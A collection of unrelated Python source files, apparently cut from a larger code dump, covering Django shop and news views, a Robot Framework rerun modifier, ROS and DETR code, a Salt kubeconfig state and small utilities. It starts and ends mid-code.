                messages.error(request, "The given address was not found.")
                # BUG FIX: ``get`` is a bound method, so ``self`` must not be
                # passed explicitly; the original call shifted every argument
                # (request became self.kwargs' positional slot).
                return self.get(request, *args, **kwargs)
        else:
            address_form = AddressForm(request.POST)
            if address_form.is_valid():
                address = address_form.save(commit=False)
                address.user = request.user
                address.save()
            else:
                # BUG FIX: an invalid submission previously fell through with
                # ``address`` unbound (NameError); re-render with form errors.
                return render(
                    request,
                    "shop/checkout.html",
                    {"address_form": address_form, "order": order},
                )
        order.address = address
        order.save()
        self.kwargs["address_pk"] = None
        messages.success(request, "Address saved.")
        return redirect("shop:payment-choice")
class PaymentChoice(LoginRequiredMixin, View):
    """Let the user pick a payment method for the open order.

    Cash orders are placed immediately; any other method redirects to the
    order's payment URL.
    """

    def get(self, request, *args, **kwargs):
        order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
        if order.order_items.count() < 1:
            messages.error(request, "Sorry you do not have any items in your order.")
            return redirect("shop:product-list")
        payment_choice_form = PaymentChoiceForm()
        return render(
            request,
            "shop/payment_choices.html",
            {"payment_choice_form": payment_choice_form, "order": order},
        )

    def post(self, request, *args, **kwargs):
        order: Order
        order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
        if order.order_items.count() < 1:
            messages.error(request, "Sorry you do not have any items in your order.")
            return redirect("shop:product-list")
        payment_choice_form = PaymentChoiceForm(request.POST, instance=order)
        if payment_choice_form.is_valid():
            order = payment_choice_form.save()
            if order.payment_method == Order.PaymentChoices.cash:
                order.place_order()
                messages.success(request, "Your Order has been recorded.")
                return redirect("shop:cart")
            else:
                return redirect(order.get_payment_url())
        # BUG FIX: the original fell through and returned ``None`` for an
        # invalid form (Django raises a 500); re-render with the form errors.
        return render(
            request,
            "shop/payment_choices.html",
            {"payment_choice_form": payment_choice_form, "order": order},
        )
class MomoPayment(LoginRequiredMixin, View):
    """Prepare (or refresh) a mobile-money payment for an order and render the pay page."""

    def get(self, request, pk=None, *args, **kwargs):
        order: Order
        if pk:
            order = get_object_or_404(Order, user=request.user, pk=pk)
        else:
            order = get_object_or_404(Order, ordered=False, user=request.user)
        if not order.address:
            messages.error(request, "Cannot process order for payment without address.")
            return redirect("shop:product-list")
        if order.order_items.count() < 1:
            messages.error(request, "Sorry you do not have any items in your order.")
            return redirect("shop:product-list")
        payment_qs = order.payments.filter(paid=False, payment_type=Payment.PaymentChoices.momo)
        if order.compute_amount_to_pay() <= 0:
            # Nothing left to pay; just show the order.
            return redirect(order.get_absolute_url())
        if payment_qs.exists():
            payment = payment_qs.first()
            payment.amount = order.compute_amount_to_pay()
            # BUG FIX: persist the refreshed amount -- the original updated
            # only the in-memory instance, leaving a stale amount in the DB.
            payment.save()
        else:
            payment = Payment.objects.create(
                order=order,
                amount=order.compute_amount_to_pay(),
                payment_type=Payment.PaymentChoices.momo,
            )
        return render(request, "shop/make_payment.html", {'payment': payment, 'order': order, "paystack_public_key": settings.PAYSTACK_PUBLIC_KEY})
class ConfirmMomoPayment(LoginRequiredMixin, DetailView):
    """Verify a momo payment with the provider and place the order on success."""
    model = Payment

    def get_queryset(self):
        # Users may only confirm payments attached to their own orders.
        return Payment.objects.filter(order__user=self.request.user)

    def get(self, request: HttpRequest, *args, **kwargs) -> HttpResponse:
        payment: Payment = self.get_object()
        confirmed, message = payment.confirm_payment()
        if not confirmed:
            messages.error(request, message)
            return redirect(payment.order.get_payment_url())
        messages.success(request, message)
        payment.order.place_order()
        return redirect(payment.order.get_absolute_url())
class OrderList(LoginRequiredMixin, ListView):
    """Placed orders of the current user, incomplete ones first."""
    model = Order
    context_object_name = "orders"
    paginate_by = 12
    template_name = "shop/order_list.html"

    def get_queryset(self):
        qs = Order.objects.filter(user=self.request.user, ordered=True)
        # False sorts before True, so still-open orders lead the list.
        return qs.order_by("is_completed")
class OrderDetail(LoginRequiredMixin, DetailView):
    """Detail page for one of the current user's placed orders."""
    model = Order
    context_object_name = "order"
    template_name = "shop/order_detail.html"

    def get_queryset(self):
        # Only the requesting user's placed orders are visible.
        return Order.objects.filter(ordered=True, user=self.request.user)
class OrderItemDetail(LoginRequiredMixin, DetailView):
    """Detail page for a single line item of a placed order."""
    model = OrderItem
    context_object_name = "order_item"
    template_name = "shop/order_item_detail.html"

    def get_queryset(self):
        # Only items belonging to the requesting user's placed orders.
        return OrderItem.objects.filter(
            order__ordered=True, order__user=self.request.user
        )
|
"""Pre-run modifier that excludes tests that run PASS last time.
"""
import os
from robot.api import ExecutionResult, ResultVisitor, SuiteVisitor
from robot.running.model import Variable
class rerunfailed(SuiteVisitor):
def __init__(self, original_output_xml):
if not os.path.isfile(original_output_xml):
raise FileNotFoundError(f'{original_output_xml} is no file')
result = ExecutionResult(original_output_xml)
results_visitor = DataDriverResultsVisitor()
result.visit(results_visitor)
self._failed_tests = results_visitor.failed_tests
def start_suite(self, suite):
"""Remove tests that match the given pattern."""
if self._suite_is_data_driven(suite):
dynamic_tests = Variable('@{DYNAMICTESTS}', self._failed_tests, suite.source)
suite.resource.variables.append(dynamic_tests)
else:
suite.tests = [t for t in suite.tests if f'{t.parent.name}.{t.name}' in self._failed_tests]
def _suite_is_data_driven(self, suite):
for resource in suite.resource.imports:
if resource.name == 'DataDriver':
return True
def end_suite(self, suite):
"""Remove suites that are empty after removing tests."""
suite.suites = [s for s in suite.suites if s.test_count > 0]
def visit_test(self, test):
"""Avoid visiting tests and their keywords to save a little time."""
pass
class DataDriverResultsVisitor(ResultVisitor):
def __init__(self):
self.failed_tests = list()
def start_test(self, test):
if test.status == 'FAIL':
self.failed_tests.append(f'{test.parent.name}.{test.name}')
|
from typing import Tuple
from UE4Parse import DefaultFileProvider
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Versions import VersionContainer
class StreamedFileProvider(DefaultFileProvider):
    """File provider fed from in-memory streams rather than a directory scan."""

    def __init__(self, versions: VersionContainer = VersionContainer.default(),
                 isCaseInsensitive: bool = False):
        # "." is a placeholder path; actual data arrives via ``initialize``.
        super().__init__(".", versions, isCaseInsensitive)

    def initialize(self, filename: str, streams: Tuple[BinaryStream]):
        """Register ``streams`` as the container named ``filename``."""
        self.register_container(filename, streams)
|
#!/usr/bin/env python2
import time
import rospy
from sensor_msgs.msg import JointState
from std_msgs.msg import Header
from visualization_msgs.msg import Marker
import tf
def talker():
    """Publish a cube Marker that follows the joint1 -> basic_shapes transform.

    Looks the transform up slightly in the past (0.1 s) each cycle and
    republishes the marker at 20 Hz until ROS shuts down.
    """
    rospy.init_node("following_marker", anonymous=True)
    pub_marker = rospy.Publisher("visualization_marker", Marker, queue_size=10)
    rate = rospy.Rate(20)
    listener = tf.TransformListener()
    marker_ = Marker()
    marker_.header.frame_id = "/joint1"
    marker_.ns = "basic_cube"
    print("publishing ...")
    while not rospy.is_shutdown():
        # Query slightly in the past so the tf buffer already has data for it.
        now = rospy.Time.now() - rospy.Duration(0.1)
        try:
            trans, rot = listener.lookupTransform("joint1", "basic_shapes", now)
        except Exception as e:
            # tf raises several lookup/extrapolation errors; skip this cycle.
            print(e)
            continue
        print(type(trans), trans)
        print(type(rot), rot)
        # marker
        marker_.header.stamp = now
        marker_.type = marker_.CUBE
        marker_.action = marker_.ADD
        marker_.scale.x = 0.04
        marker_.scale.y = 0.04
        marker_.scale.z = 0.04
        # marker position initial
        marker_.pose.position.x = trans[0]
        marker_.pose.position.y = trans[1]
        marker_.pose.position.z = trans[2]
        marker_.pose.orientation.x = rot[0]
        marker_.pose.orientation.y = rot[1]
        marker_.pose.orientation.z = rot[2]
        marker_.pose.orientation.w = rot[3]
        # fully opaque green cube
        marker_.color.a = 1.0
        marker_.color.g = 1.0
        pub_marker.publish(marker_)
        rate.sleep()
if __name__ == "__main__":
    try:
        talker()
    except rospy.ROSInterruptException:
        # Raised by rospy on node shutdown (e.g. Ctrl-C); exit quietly.
        pass
|
#!/usr/bin/env python3
from json import dumps as json_dumps
from logging.config import dictConfig as logging_dict_config
from modules.api_client import ApiClient
from modules.cache import PickledDictCache
from modules.config import config
def create_client(api_cache=None):
    """Build an :class:`ApiClient` from the global config.

    :param api_cache: cache instance handed to the client.  Defaults to the
        module-global ``cache`` created in ``__main__`` -- kept for backward
        compatibility with the original zero-argument call, but the explicit
        parameter removes the hidden dependency on a global defined later.
    """
    return ApiClient(
        user=config.github.user,
        token=config.github.token,
        repo=config.github.repo,
        branch=config.github.branch,
        min_date=config.github.min_date,
        max_date=config.github.max_date,
        cache=cache if api_cache is None else api_cache,
    )
if __name__ == '__main__':
    logging_dict_config(config.logging)
    # Module-global cache shared by all API calls (read by create_client).
    cache = PickledDictCache(config.cache.conn_string)
    client = create_client()
    reports = (
        client.get_top_contributors(),
        client.get_pull_request_stats(),
        client.get_issue_stats(),
    )
    # Persist anything fetched while building the reports.
    cache.save()
    if config.report.output_format == 'text':
        for r in reports:
            print('\n'.join(r.to_table()))
            print('\n')
    elif config.report.output_format == 'json':
        obj = {r.key(): r.to_dict() for r in reports}
        print(json_dumps(obj))
|
from django.http import JsonResponse
from django.shortcuts import render
from django.contrib import sessions
from django.views.generic import View
from django.utils import timezone
from app.RoleMethod.PublicMethod import PublicMethod
from django.views import View
from app.serialize.serializer_user import *
from django.core.cache import cache
"""
获取新闻列表
发布新闻
修改新闻
查看新闻
"""
class GetNewList(View):
    """News back-office listing endpoint.

    GET without ``news_id`` returns one page of news records, optionally
    filtered by ``text`` (matched against creator or title), most-important
    first; with ``news_id`` it returns that single record.  Response shape:
    ``{'status': ..., 'message': <record(s)>, 'total': <count>}``.
    """
    def get(self, request):
        page = request.GET.get('page')
        total = request.GET.get('total')
        text = request.GET.get('text')
        news_id = request.GET.get('news_id')
        news = News.objects.all()
        if not news_id:
            if text:
                # Free-text search over creator and title.
                news = news.filter(Q(news_creator__contains=text) | Q(news_title__contains=text))
            news = news.order_by('-news_importance')
            news_num = news.count()
            # Manual pagination; page/total come straight from the query string.
            news = news[(int(page) - 1) * int(total): int(page) * int(total)]
            info = []
            for new in news:
                info.append({
                    "news_id": new.news_id,
                    "news_title": new.news_title,
                    "news_introduce": new.news_introduce,
                    "news_creator": new.news_creator,
                    "create_time": new.creator_time,
                    "news_type": new.news_type,
                    "news_importance": new.news_importance,
                })
        else:
            news = news.filter(news_id=news_id).first()
            if not news:
                # BUG FIX: an unknown id previously raised AttributeError on
                # ``None``; answer like the sibling news endpoints instead.
                return JsonResponse({'status': False, 'message': '此新闻不存在'})
            info = {
                "news_id": news.news_id,
                "news_title": news.news_title,
                "news_introduce": news.news_introduce,
                "news_creator": news.news_creator,
                "create_time": news.creator_time,
                "news_type": news.news_type,
                "news_importance": news.news_importance,
            }
            news_num = 1
        return JsonResponse({'status': True, "message": info, 'total': news_num})
class AddNews(View):
    """News management: create (POST), update (PUT) and delete (DELETE).

    All verbs authenticate via the ``token`` cookie (mapped to a user id in
    the cache) and require ``user_power <= 2``; editors (power == 2) may only
    modify or delete news they created themselves.
    """

    @staticmethod
    def _auth(request):
        """Resolve the requesting user from the token cookie.

        Returns ``(user_id, capacity)``; ``(None, None)`` when the token is
        missing or expired.
        """
        token = request.COOKIES.get("token")
        user_id = cache.get(token)
        if not user_id:
            return None, None
        capacity = User.objects.filter(user_id=user_id).first().user_power
        return user_id, capacity

    def post(self, request):
        user_id, capacity = self._auth(request)
        if not user_id:
            return JsonResponse({'status': False, 'message': '未登录'})
        if capacity > 2:
            return JsonResponse({'status': False, 'message': '权限不足'})
        news_introduce = request.POST.get("news_introduce")
        news_title = request.POST.get("news_title")
        news_type = request.POST.get("news_type")
        news_importance = request.POST.get('news_importance')
        News.objects.create(
            news_title=news_title,
            news_introduce=news_introduce,
            news_creator=user_id,
            creator_time=timezone.now(),
            news_importance=news_importance,
            news_type=news_type
        )
        return JsonResponse({'status': True, 'message': '新闻创建成功'})

    def put(self, request):
        user_id, capacity = self._auth(request)
        if not user_id:
            return JsonResponse({'status': False, 'message': '未登录'})
        # NOTE(review): update fields are read from the query string, not the
        # request body -- confirm this matches the front-end's PUT calls.
        news_id = request.GET.get('news_id')
        news = News.objects.filter(news_id=news_id).first()
        if not news:
            return JsonResponse({'status': False, 'message': '此新闻不存在'})
        if capacity > 2 or (capacity == 2 and news.news_creator != user_id):
            return JsonResponse({'status': False, 'message': '权限不足'})
        # Apply only the fields that were actually supplied.
        for field in ('news_title', 'news_introduce', 'news_importance', 'news_type'):
            value = request.GET.get(field)
            if value is not None:
                setattr(news, field, value)
        news.save()
        return JsonResponse({'status': True, 'message': '修改成功'})

    def delete(self, request):
        user_id, capacity = self._auth(request)
        if not user_id:
            return JsonResponse({'status': False, 'message': '未登录'})
        news_id = request.GET.get('news_id')
        news = News.objects.filter(news_id=news_id).first()
        if not news:
            return JsonResponse({'status': False, 'message': '此新闻不存在'})
        if capacity > 2 or (capacity == 2 and news.news_creator != user_id):
            return JsonResponse({'status': False, 'message': '权限不足'})
        news.delete()
        return JsonResponse({'status': True, 'message': '删除成功'})
|
import torch
import torch.nn.functional as F
from .strategy_utils import top_k_top_p_filtering
import utils
from decoding_strategy import BaseDecoding
class SinglePassDecoding(BaseDecoding):
    """Left-to-right single-pass decoding (greedy or sampled) for an
    encoder-decoder model."""

    def generate(self, model, batch):
        """Decode one batch.

        Returns ``(input_ids, probs)`` where ``input_ids`` contains the
        generated decoder token ids (BOS included) and ``probs[b]`` lists
        the model probability of each chosen token for batch element ``b``.
        """
        net_input = utils.move_to_cuda(batch['net_input'])
        encoder_input_ids = net_input['input_ids']
        encoder_attn_mask = net_input['attention_mask']
        batch_size = encoder_input_ids.shape[0]
        # Encode once; the encoder outputs are reused at every decode step.
        encoder = model.get_encoder()
        encoder_outputs = encoder(encoder_input_ids,
                                  attention_mask=encoder_attn_mask)
        # create empty decoder_input_ids
        input_ids = torch.full(
            (batch_size, 1),
            self.decoder_bos_idx,
            dtype=torch.long,
            device=next(model.parameters()).device,
        )
        cur_len = 1
        probs = [[] for _ in range(batch_size)]
        # 1 while a sentence is still generating, 0 once it has emitted EOS.
        unfinished_sents = input_ids.new(batch_size).fill_(1)
        past = encoder_outputs # defined for encoder-decoder models, None for decoder-only models
        while cur_len < self.domain_to_max_len[self.domain]:
            model_inputs = self.prepare_inputs_for_generation(input_ids,
                                                              past=past,
                                                              attention_mask=encoder_attn_mask)
            outputs = model(**model_inputs)
            # Logits for the next position only.
            next_token_logits = outputs[0][:, -1, :]
            past = outputs[1]
            if self.do_sampling:
                # Temperature (higher temperature => more likely to sample low probability tokens)
                if self.temperature != 1.0:
                    next_token_logits = next_token_logits / self.temperature
                # Top-p/top-k filtering
                next_token_logits = top_k_top_p_filtering(next_token_logits, top_k=self.topk, top_p=self.topp)
                # Sample
                next_token_probs = F.softmax(next_token_logits, dim=-1)
                next_token = torch.multinomial(next_token_probs, num_samples=1).squeeze(1)
            else:
                # Greedy decoding
                next_token_probs = F.softmax(next_token_logits, dim=-1)
                next_token = torch.argmax(next_token_logits, dim=-1)
            # Probability the model assigned to the token actually chosen.
            chosen_token_probs = next_token_probs.gather(1, next_token.view(-1, 1))
            for b in range(batch_size):
                probs[b].append(chosen_token_probs[b, 0].item())
            # pad finished sentences if eos_token_id exist
            tokens_to_add = next_token * unfinished_sents + (self.pad_idx) * (1 - unfinished_sents)
            if not self.quiet:
                # Debug trace: token and probability per batch element.
                output_str = ''
                for b in range(batch_size):
                    w = self.tokenizer.convert_ids_to_tokens([tokens_to_add[b]])[0]
                    p = probs[b][-1]
                    output_str += '{:>12}({:.2f})|'.format(w, 100 * p)
                if cur_len == 1:
                    print('=' * 50)
                print('step={:<3d}|{}'.format(cur_len, output_str))
            input_ids = torch.cat([input_ids, tokens_to_add.unsqueeze(-1)], dim=-1)
            eos_in_sents = tokens_to_add == self.eos_idx
            unfinished_sents.mul_((~eos_in_sents).long())
            # stop when there is a </s> in each sentence, or if we exceed the maximul length
            if unfinished_sents.max() == 0:
                break
            cur_len = cur_len + 1
        return input_ids, probs
|
# -*- coding: utf-8 -*-
from base64 import b64encode, b64decode
from datetime import datetime, timedelta
import os
import stat
import yaml
# Name under which Salt exposes this module.
__virtualname__ = 'metalk8s_kubeconfig'
def __virtual__():
    """Tell Salt to load this module as ``metalk8s_kubeconfig``."""
    return __virtualname__
def _validateKubeConfig(filename,
                        expected_ca_data,
                        expected_api_server,
                        expected_cn):
    """Validate a kubeconfig filename.
    Validate that the kubeconfig provided by filename
    conforms with the expected CA data, API server URL and client CN.
    This function is used for managed idempotency.
    :return: True if the kubeconfig file matches expectation
             False otherwise (ie need to be regenerated)
    """
    # Verify if the file exists
    if not os.path.isfile(filename):
        return False
    # Verify that the mode is 600
    if stat.S_IMODE(os.stat(filename).st_mode) != 0o600:
        return False
    # Unparseable YAML means the file must be regenerated.
    try:
        with open(filename, 'r') as fd:
            kubeconfig = yaml.safe_load(fd)
    except Exception:
        return False
    # Verify that the current CA cert on disk matches the expected CA cert
    # and the API Server on the existing file match with the expected
    try:
        cluster_info = kubeconfig['clusters'][0]['cluster']
        current_ca_data = cluster_info['certificate-authority-data']
        current_api_server = cluster_info['server']
    except (KeyError, IndexError):
        return False
    if current_ca_data != expected_ca_data:
        return False
    if current_api_server != expected_api_server:
        return False
    # Client Key and certificate verification
    try:
        b64_client_key = kubeconfig['users'][0]['user']['client-key-data']
        b64_client_cert = kubeconfig['users'][0][
            'user']['client-certificate-data']
    except (KeyError, IndexError):
        return False
    # NOTE(review): catching TypeError suggests this targets Python 2's
    # b64decode error behaviour -- confirm against the supported Python.
    try:
        client_key = b64decode(b64_client_key)
        client_cert = b64decode(b64_client_cert)
    except TypeError:
        return False
    ca_pem_cert = b64decode(current_ca_data)
    client_cert_detail = __salt__['x509.read_certificate'](client_cert)
    # Verify client cn
    try:
        current_cn = client_cert_detail['Subject']['CN']
    except KeyError:
        return False
    else:
        if current_cn != expected_cn:
            return False
    # Verify client client cert expiration date is > 30days
    try:
        expiration_date = client_cert_detail['Not After']
    except KeyError:
        return False
    else:
        # Regenerate if the cert expires within the next 30 days.
        if datetime.strptime(expiration_date, "%Y-%m-%d %H:%M:%S") \
                - timedelta(days=30) < datetime.now():
            return False
    # Cert must be signed by our CA, and key must match the cert.
    if __salt__['x509.verify_signature'](
            client_cert, ca_pem_cert) is not True:
        return False
    if __salt__['x509.verify_private_key'](
            client_key, client_cert) is not True:
        return False
    return True
def managed(name,
            ca_server,
            signing_policy,
            client_cert_info,
            apiserver,
            cluster,
            **kwargs):
    """Generate kubeconfig file with identities for control plane components

    :param name: path of the kubeconfig file to manage
    :param ca_server: minion id of the CA; used both to fetch the CA cert
        from the Salt mine and as signer of the new client cert
    :param signing_policy: x509 signing policy name for the client cert
    :param client_cert_info: subject fields for the client cert; its ``CN``
        becomes the kubeconfig user name
    :param apiserver: API server URL written into the cluster entry
    :param cluster: cluster name for the context entry
    :return: standard Salt state return dict
    """
    ret = {
        'name': name,
        'changes': {},
        'comment': "",
        'result': True,
    }
    # Get the CA cert from mine
    try:
        b64_ca_cert = __salt__['mine.get'](
            ca_server,
            'kubernetes_root_ca_b64'
        )[ca_server]
    except KeyError:
        ret.update({
            'comment':
                '{0} CA server is not advertized in mine'.format(ca_server),
            'result': False
        })
        return ret
    else:
        # Mine data may contain newlines; normalise before comparing/writing.
        b64_ca_cert = b64_ca_cert.replace('\n', '')
    user = client_cert_info.get('CN')
    # Validate if a kubeconfig already exists (idempotency)
    if _validateKubeConfig(name, b64_ca_cert, apiserver, user):
        ret.update({'comment': 'kubeconfig file exists and is up-to-date'})
        return ret
    client_priv_key = __salt__['x509.create_private_key'](
        text=True, verbose=False
    )
    client_cert = __salt__['x509.create_certificate'](
        text=True,
        public_key=client_priv_key,  # pub key is sourced from priv key
        ca_server=ca_server,
        signing_policy=signing_policy,
        **client_cert_info
    )
    # NOTE(review): b64encode expects bytes on Python 3; this assumes the
    # x509 calls return str under Python 2 -- verify on the target runtime.
    dataset = {
        'apiVersion': 'v1',
        'clusters': [
            {
                'cluster': {
                    'certificate-authority-data': b64_ca_cert,
                    'server': apiserver,
                },
                'name': cluster
            }
        ],
        'contexts': [
            {
                'context': {
                    'cluster': cluster,
                    'user': user,
                },
                'name': '{0}@{1}'.format(user, cluster),
            }
        ],
        'current-context': '{0}@{1}'.format(user, cluster),
        'kind': 'Config',
        'preferences': {},
        'users': [
            {
                'name': user,
                'user': {
                    'client-certificate-data': b64encode(client_cert),
                    'client-key-data': b64encode(client_priv_key)
                }
            }
        ]
    }
    # Delegate the actual write (mode 600, YAML) to the file.serialize state.
    return __states__['file.serialize'](
        name=name,
        dataset=dataset,
        formatter="yaml",
        mode="600",
        makedirs=True
    )
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from models.matcher import HungarianMatcher
from models.position_encoding import PositionEmbeddingSine, PositionEmbeddingLearned
from models.backbone import Backbone
from util import box_ops
from util.misc import nested_tensor_from_tensor_list
from hubconf import detr_resnet50, detr_resnet50_panoptic
from models.deformable_attn import DeformableHeadAttention, generate_ref_points
class Tester(unittest.TestCase):
    """Unit tests for DETR components: box conversions, the Hungarian
    matcher, position encodings, TorchScript compatibility of the models,
    and the deformable attention module."""

    def test_box_cxcywh_to_xyxy(self):
        # Round-tripping through both conversions must be (numerically) identity.
        t = torch.rand(10, 4)
        r = box_ops.box_xyxy_to_cxcywh(box_ops.box_cxcywh_to_xyxy(t))
        self.assertLess((t - r).abs().max(), 1e-5)
    @staticmethod
    def indices_torch2python(indices):
        # Convert matcher output (tensors) to plain lists for comparison.
        return [(i.tolist(), j.tolist()) for i, j in indices]
    def test_hungarian(self):
        """Matcher must assign every target and be independent of batching."""
        n_queries, n_targets, n_classes = 100, 15, 91
        logits = torch.rand(1, n_queries, n_classes + 1)
        boxes = torch.rand(1, n_queries, 4)
        tgt_labels = torch.randint(high=n_classes, size=(n_targets,))
        tgt_boxes = torch.rand(n_targets, 4)
        matcher = HungarianMatcher()
        targets = [{'labels': tgt_labels, 'boxes': tgt_boxes}]
        indices_single = matcher({'pred_logits': logits, 'pred_boxes': boxes}, targets)
        indices_batched = matcher({'pred_logits': logits.repeat(2, 1, 1),
                                   'pred_boxes': boxes.repeat(2, 1, 1)}, targets * 2)
        self.assertEqual(len(indices_single[0][0]), n_targets)
        self.assertEqual(len(indices_single[0][1]), n_targets)
        # Each batched element must match the single-sample result.
        self.assertEqual(self.indices_torch2python(indices_single),
                         self.indices_torch2python([indices_batched[0]]))
        self.assertEqual(self.indices_torch2python(indices_single),
                         self.indices_torch2python([indices_batched[1]]))
        # test with empty targets
        tgt_labels_empty = torch.randint(high=n_classes, size=(0,))
        tgt_boxes_empty = torch.rand(0, 4)
        targets_empty = [{'labels': tgt_labels_empty, 'boxes': tgt_boxes_empty}]
        indices = matcher({'pred_logits': logits.repeat(2, 1, 1),
                           'pred_boxes': boxes.repeat(2, 1, 1)}, targets + targets_empty)
        self.assertEqual(len(indices[1][0]), 0)
        indices = matcher({'pred_logits': logits.repeat(2, 1, 1),
                           'pred_boxes': boxes.repeat(2, 1, 1)}, targets_empty * 2)
        self.assertEqual(len(indices[0][0]), 0)
    def test_position_encoding_script(self):
        # Both encodings must be scriptable.
        m1, m2 = PositionEmbeddingSine(), PositionEmbeddingLearned()
        mm1, mm2 = torch.jit.script(m1), torch.jit.script(m2)  # noqa
    def test_backbone_script(self):
        backbone = Backbone('resnet50', True, False, False)
        torch.jit.script(backbone)  # noqa
    def test_model_script_detection(self):
        """Scripted detection model must match eager outputs exactly."""
        model = detr_resnet50(pretrained=False).eval()
        scripted_model = torch.jit.script(model)
        x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
        out = model(x)
        out_script = scripted_model(x)
        self.assertTrue(out["pred_logits"].equal(out_script["pred_logits"]))
        self.assertTrue(out["pred_boxes"].equal(out_script["pred_boxes"]))
    def test_model_script_panoptic(self):
        """Scripted panoptic model must match eager outputs, masks included."""
        model = detr_resnet50_panoptic(pretrained=False).eval()
        scripted_model = torch.jit.script(model)
        x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
        out = model(x)
        out_script = scripted_model(x)
        self.assertTrue(out["pred_logits"].equal(out_script["pred_logits"]))
        self.assertTrue(out["pred_boxes"].equal(out_script["pred_boxes"]))
        self.assertTrue(out["pred_masks"].equal(out_script["pred_masks"]))
    def test_model_detection_different_inputs(self):
        """Model must accept NestedTensor, 4d Tensor and list-of-3d-Tensor inputs."""
        model = detr_resnet50(pretrained=False).eval()
        # support NestedTensor
        x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
        out = model(x)
        self.assertIn('pred_logits', out)
        # and 4d Tensor
        x = torch.rand(1, 3, 200, 200)
        out = model(x)
        self.assertIn('pred_logits', out)
        # and List[Tensor[C, H, W]]
        x = torch.rand(3, 200, 200)
        out = model([x])
        self.assertIn('pred_logits', out)
    def test_deformable_attn(self):
        # Smoke test only (asserts True); requires a CUDA device.
        defomable_attn = DeformableHeadAttention(h=8,
                                                 d_model=256,
                                                 k=4,
                                                 last_feat_width=16,
                                                 last_feat_height=16,
                                                 scales=4,
                                                 need_attn=True)
        defomable_attn = defomable_attn.cuda()
        w = 16
        h = 16
        querys = []
        ref_points = []
        # Build a 4-level feature pyramid of queries and reference points.
        for i in range(4):
            ww = w * 2**i
            hh = h * 2**i
            q = torch.rand([2, hh, ww, 256])
            q = q.cuda()
            querys.append(q)
            ref_point = generate_ref_points(width=ww, height=hh)
            ref_point = ref_point.type_as(q)
            ref_points.append(ref_point)
        feat, ref_points, attns = defomable_attn(querys[0], querys, ref_points[0])
        self.assertTrue(True)
    def test_backbone_forward(self):
        # Prints the multi-scale feature shapes; no assertions.
        backbone = Backbone('resnet50', True, True, False)
        x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
        out = backbone(x)
        for key, value in out.items():
            print('{} {}'.format(key, value.tensors.shape))
    def test_transformer_forward(self):
        # NOTE(review): despite the name this only runs the backbone -- same
        # body as test_backbone_forward; confirm whether it should do more.
        backbone = Backbone('resnet50', True, True, False)
        x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
        out = backbone(x)
        for key, value in out.items():
            print('{} {}'.format(key, value.tensors.shape))
if __name__ == '__main__':
    # Run the full test suite when executed directly.
    unittest.main()
|
from optparse import make_option
from django.core.management.base import BaseCommand
from django.db.models import Q
import amo
from addons.models import Addon
from amo.utils import chunked
from devhub.tasks import convert_purified, flag_binary, get_preview_sizes
from market.tasks import check_paypal, check_paypal_multiple
from mkt.webapps.tasks import add_uuids, update_manifests
# Registry of runnable addon tasks: each entry maps a --task name to the
# celery task to delay ('method'), optional queryset filters ('qs'),
# an optional pk pre-processor ('pre') and extra delay kwargs ('kwargs').
tasks = {
    # binary-components depend on having a chrome manifest.
    'flag_binary_components': {'method': flag_binary,
                               'qs': [Q(type__in=[amo.ADDON_EXTENSION,
                                                  amo.ADDON_DICT,
                                                  amo.ADDON_LPADDON,
                                                  amo.ADDON_PLUGIN,
                                                  amo.ADDON_API]),
                                      Q(disabled_by_user=False)],
                               'kwargs': dict(latest=False)},
    'flag_binary': {'method': flag_binary, 'qs': []},
    'get_preview_sizes': {'method': get_preview_sizes, 'qs': []},
    'convert_purified': {'method': convert_purified, 'qs': []},
    'check_paypal': {'pre': check_paypal_multiple,
                     'method': check_paypal,
                     'qs': [Q(premium_type=amo.ADDON_PREMIUM,
                              disabled_by_user=False),
                            ~Q(status=amo.STATUS_DISABLED)]},
    'update_manifests': {'method': update_manifests,
                         'qs': [Q(type=amo.ADDON_WEBAPP, is_packaged=False,
                                  status=amo.STATUS_PUBLIC,
                                  disabled_by_user=False)]},
    'add_uuids': {'method': add_uuids,
                  'qs': [Q(type=amo.ADDON_WEBAPP, guid=None),
                         ~Q(status=amo.STATUS_DELETED)]},
}
class Command(BaseCommand):
    """
    A generic command to run a task on addons.
    Add tasks to the tasks dictionary, providing a list of Q objects if you'd
    like to filter the list down.
    method: the method to delay
    pre: a method to further pre process the pks, must return the pks (opt.)
    qs: a list of Q objects to apply to the method
    kwargs: any extra kwargs you want to apply to the delay method (optional)
    """
    option_list = BaseCommand.option_list + (
        make_option('--task', action='store', type='string',
                    dest='task', help='Run task on the addons.'),
    )

    def handle(self, *args, **options):
        task = tasks.get(options.get('task'))
        if not task:
            # BUG FIX: name the offending task as well -- the original
            # message said "Unknown task:" but only listed the known ones.
            raise ValueError('Unknown task: %s. Options: %s'
                             % (options.get('task'), ', '.join(tasks.keys())))
        pks = (Addon.objects.filter(*task['qs'])
                            .values_list('pk', flat=True)
                            .order_by('-last_updated'))
        if 'pre' in task:
            # The pre-processor may filter or reorder the pks entirely.
            pks = task['pre'](pks)
        if pks:
            # Fan the work out to celery in chunks of 100 ids.
            for chunk in chunked(pks, 100):
                task['method'].delay(chunk, **task.get('kwargs', {}))
|
import psutil
# Module-level memo: the locker's pid (if known) and the pid set seen last call.
_pids_data = {'lock_pid': None, 'last_pids': set()}


def is_locked(lock_name='i3lock') -> bool:
    """Return True while a process whose cmdline contains *lock_name* is alive.

    Caches the locker's pid and the previously seen pid set in ``_pids_data``
    so only newly spawned processes are inspected on subsequent calls.
    """
    current = set(psutil.pids())
    cached_pid = _pids_data['lock_pid']
    if cached_pid:
        if cached_pid in current:
            return True
        # The locker exited since the last call; forget it.
        _pids_data['lock_pid'] = None
        _pids_data['last_pids'] = current
        return False
    for pid in current - _pids_data['last_pids']:
        try:
            with open(f'/proc/{pid}/cmdline', 'rb') as fh:
                cmdline = fh.read().replace(b'\x00', b' ').decode()
            if lock_name in cmdline:
                _pids_data['lock_pid'] = pid
                _pids_data['last_pids'] = current
                return True
